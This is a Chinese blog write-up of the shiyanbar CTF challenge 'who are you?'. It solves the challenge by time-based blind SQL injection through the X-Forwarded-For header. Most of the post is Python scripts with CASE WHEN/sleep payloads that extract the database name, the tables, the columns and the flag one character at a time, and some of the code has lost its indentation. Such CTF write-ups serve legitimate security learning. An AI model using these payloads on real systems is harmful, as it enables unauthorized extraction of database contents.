实验吧_who are you?(盲注)

who are you?

翻翻源码,抓抓包,乱试一通都没有什么结果

题目中提示有ip,立马应该联想到X-Forwarded-For

虽然知道是这个方面的题,但完全不知道从何入手,悄咪咪去翻一下wp

才知道原来X-Forwarded-For后面的的参数是先入数据库再取出来,并不是直接显示的

所以这里的X-Forwarded-For应该是存在注入的(果然是大佬,学到了)

而且经过测试,','以及后面的内容都会被过滤,这就导致我们的传统注入语句失效了

实验吧_who are you?(盲注)

查了一下,这里需要用到select case when then语句

提交X-Forwarded-For:1'  and case when (length((SELECT concat(database())))<10) then sleep(3) else sleep(0) end and '1'='1;果然发生了延迟

实验吧_who are you?(盲注)

接下来的原理就跟基于时间的盲注一样,只要不断替换when后面的判断语句,这要是手工的话还真是个体力活- -

我也正好趁着这种机会好好练习一下python

先是手工判断了一下数据库名的长度为4,接着上代码开始跑

 import requests

 guess='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
database = ''
for i in range(1,5):
for each in guess:
headers = {"X-Forwarded-For":"1' and case when (substring((select database()) from %s for 1)='%s') then sleep(5) else sleep(0) end and '1'='1" %(i,each)}
try:
r = requests.get(url, headers = headers, timeout=5)
print(r.text)
except:
database = database + each break print('database_name='+database)

实验吧_who are you?(盲注)

又手工看了一下当前数据库中表的数量

只有两张,这就很舒服

实验吧_who are you?(盲注)

接着跑一下看看所有表名的字长

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
i=1
table_length=0
tables="" while True:
headers={
"X-Forwarded-For":"1' and case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end and 'a'='a" % (i)
}
try:
r = requests.get(url, headers=headers, timeout=6)
print(" "+r.text)
i+=1
except:
table_length = i-1
break
print(table_length)

最后得出是14,接着开始跑表名

我反复测试了好久,这应该是网络的问题,代码没有错,只是每次跑的结果都有几个字母不一样让我很难受

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
tables = ''
for i in range(1,15):
for each in range(30,127):
headers={
"X-Forwarded-For":"1' and case when(ascii(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1))=%s) then sleep(6) else 0 end and 'a'='a" % (i,each)
}
try:
r = requests.get(url, headers=headers, timeout=6)
print(" "+r.text)
except:
tables += chr(each)
print("")
print(chr(each))
print("")
break print("tables: %s" % tables)

想我也是看过wp的人,怎么会拘泥于这种小结呢,通过wp我知道了两张表分别是cilent_ip和flag(而我每次都是奇怪的字符,比如cl:"t_ip;fHag,六秒的延迟竟然还会错这么多,我只能说中国移动天下第一- -!)

接着就是跑flag表的列了,老规矩先瞅瞅他列名的长度

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
for i in range(1,10):
headers ={
"X-Forwarded-For":"1' and case when (substring((select group_concat(column_name separator ';') from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') then sleep(6) else 0 end and 'a'='a" %i
}
try:
r = requests.get(url, headers=headers, timeout=6)
print(" "+r.text)
except:
print('the number of tables is ' + str(i-1))
break

实验吧_who are you?(盲注)

才4个字符,赶紧跑起来,我不信这次还能跑偏

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
columns = ''
for i in range(1,5):
for each in range(30,127):
header={
"X-Forwarded-For":"1' and case when(ascii(substring((select group_concat(column_name separator ';') from information_schema.columns where table_name='flag') from %s for 1))=%s) then sleep(6) else 0 end and 'a'='a" % (i,each)
}
try:
r = requests.get(url, headers=header, timeout=6)
print(" "+r.text)
except:
columns += chr(each)
print("")
print(chr(each))
print("")
break print("column: %s" % columns)

移动爸爸给我脸了!他没错!

实验吧_who are you?(盲注)

倒数第二步,看字段数!

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
data_length = 0
i = 1
while True:
header={
"X-Forwarded-For":"1' and case when(length(substring((select group_concat(flag separator ';') from flag) from %s for 1))='') then sleep(6) else 0 end and 'a'='a" %i
}
try:
r = requests.get(url, headers=header, timeout=6)
print(" "+r.text)
i += 1
except: print("")
print('the number of data is '+ str(i-1))
print("")
break

实验吧_who are you?(盲注)

32个!一口老血........

最后一步了,要dump数据了!不多说,拿去跑!

 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
data = ''
i = 1
while i <= 32:
for each in range(30,127):
header={
"X-Forwarded-For":"1' and case when(ascii(substring((select group_concat(flag separator ';') from flag ) from %s for 1))=%s) then sleep(10) else 0 end and 'a'='a" % (i,each)
}
try:
r = requests.get(url, headers=header, timeout=10)
print(" "+r.text) except:
data += chr(each)
print('')
print(chr(each))
print('')
break
i += 1
print('flag: ' + data)

以上代码经过测试均有效,跑不出来你就退群吧╮(๑•́ ₃•̀๑)╭

这篇博客大概写了有大半天了,在不断的测试修改代码的过程中也收获了很多

反正就是舒服

上一篇:崽崽帮www.zaizaibang.com精选1


下一篇:os.system